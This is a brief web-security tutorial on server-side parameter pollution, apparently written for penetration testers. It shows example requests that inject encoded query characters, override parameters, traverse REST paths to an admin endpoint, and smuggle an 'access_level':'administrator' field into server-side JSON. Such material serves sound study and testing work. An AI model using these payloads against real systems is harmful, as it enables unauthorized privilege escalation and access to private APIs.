Server Side Parameter Pollution

Place query syntax characters like #, &, and = in your input and observe how the application responds.

Example:

GET /userSearch?name=peter&back=/home

It's essential that you URL-encode the # character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.

1 - Try injecting URL-encoded # and & characters and compare the responses:

GET /userSearch?name=peter%23foo&back=/home

GET /userSearch?name=peter%26foo=xyz&back=/home

2 - If you've identified the email parameter, you could add it to the query string:

GET /userSearch?name=peter%26email=foo&back=/home

Overriding parameters

GET /userSearch?name=peter%26name=carlos&back=/home
  • PHP parses the last parameter only. This would result in a user search for carlos.

  • ASP.NET combines both parameters. This would result in a user search for peter,carlos, which might result in an Invalid username error message.

  • Node.js / Express parses the first parameter only. This would result in a user search for peter, giving an unchanged result.

REST Paths

GET /edit_profile.php?name=peter%2f..%2fadmin

This may result in the following server-side request:

GET /api/private/users/peter/../admin

Structured data

Example 1

POST /myaccount
name=peter

# Server side:

PATCH /users/7312/update
{"name":"peter"}

You can attempt to add the access_level parameter to the request as follows:

POST /myaccount
name=peter","access_level":"administrator

If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request:

PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}

Example 2

POST /myaccount
{"name": "peter"}

# Server side:

PATCH /users/7312/update
{"name":"peter"}

Add access_level by escaping the quotes inside the JSON string value, so the request body stays valid JSON:

POST /myaccount
{"name": "peter\",\"access_level\":\"administrator"}

# Server side:

PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}

Burp Extension - Backslash Powered Scanning
